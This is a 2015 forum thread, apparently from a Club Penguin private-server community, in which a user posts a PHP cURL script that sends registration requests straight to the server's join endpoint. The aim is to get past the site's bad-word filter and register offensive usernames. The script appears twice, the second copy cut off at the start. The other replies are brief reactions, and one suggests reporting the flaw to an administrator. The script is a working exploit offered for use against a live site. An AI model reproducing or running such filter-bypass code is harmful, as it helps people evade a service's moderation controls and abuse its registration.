Create account Vuln

11th April 2015
2 views

Made by TimeLock in Inventions

Reply to this discussion

TimeLock

~~Banned~~

28 posts

Seen 21st April 2015

11th April 2015, 04:52 PM

Created a little script which allows me to create an username that I desire, I don't take responsibility for your actions.
This vulnerability/carelessness allows people to create usernames with bad words.

The code tag doesn't work properly for me

Quote:

<?php
/*
* A quick PHP script which allows you create accounts with out the bad word filter
* use it responsibily.
*
* Created by TimeLock.
* 11/04/2015
*
*/

class OldCP_Create
{
public function __construct($username, $password)
{
$this->username = $username;
$this->password = $password;
}

public function createAccount()
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_URL, 'http://play.oldcp.biz/join/php/regServ.php');
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60");

$createArray = array(
"name" => $this->username,
"password" => $this->password,
"color" => rand(1, 13)
);
curl_setopt($curl, CURLOPT_POSTFIELDS, $createArray);
$response = curl_exec($curl);
$this->parseResponse($response);
}

private function parseResponse($responseData)
{
$responseSplit = explode("&", $responseData)[0];
$responseType = explode("=", $responseSplit)[0];

if($responseType == "error")
{
$responseError = explode("=", $responseSplit)[1];
echo "[Error]: " . str_replace("Username", $this->username, $responseError) . "\n";
}

if($responseType == "name")
{
echo "[Success]: Successfully created the account!\n";
}
}
}

$create = new OldCP_Create("Username", "Password");
$create->createAccount();
?>

+1 by trixie, Mattzvan, CosmoSeedrain and Luke, -1 by lulu2

Like Dislike

Undo

TimeLock

~~Banned~~

28 posts

Seen 21st April 2015

11th April 2015, 04:54 PM

-snip removed-

+1 by trixie and Mattzvan

Like Dislike

Undo

jdfr03

Rookie

8 posts

Seen 19th May 2015

Hoodies

11th April 2015, 06:25 PM

Is this helpful?

+1 by Pink Pigeun

Like Dislike

Undo

Patrick Kacket

Believe in yourself

Member

270 posts

Seen 13th March 2016

Kacket

11th April 2015, 06:29 PM

I don't get it LOL

+1 by trixie

Like Dislike

Undo

trixie

hiss

Member

1,414 posts

1,324

Seen 10th February 2022

Kacket

12th April 2015, 03:01 AM

Lol, I really am not into coding and stuff a lot, but whatever you are showing does seem quite interesting. I think if you find any fault you should contact Damen for it you see.
+1

+1 by Ras

Like Dislike

Undo

xxx

TimeLock

~~Banned~~

28 posts

Seen 21st April 2015

12th April 2015, 08:11 AM

jdfr03 wrote on 11th April 2015 06:25 PM:

Is this helpful?

username = $username;
$this->password = $password;
}

public function createAccount()
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_URL, 'http://play.oldcp.biz/join/php/regServ.php');
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60");

$createArray = array(
"name" => $this->username,
"password" => $this->password,
"color" => rand(1, 13)
);
curl_setopt($curl, CURLOPT_POSTFIELDS, $createArray);
$response = curl_exec($curl);
$this->parseResponse($response);
}

private function parseResponse($responseData)
{
$responseSplit = explode("&", $responseData)[0];
$responseType = explode("=", $responseSplit)[0];

if($responseType == "error")
{
$responseError = explode("=", $responseSplit)[1];
echo "[Error]: " . str_replace("Username", $this->username, $responseError) . "\n";
}

if($responseType == "name")
{
echo "[Success]: Successfully created the account!\n";
}
}
}

$create = new OldCP_Create("Username", "Password");
$create->createAccount();
?>

No it's snips off the beginning part of code :l

Like Dislike

Undo

Create account Vuln

Login or join the forums to reply.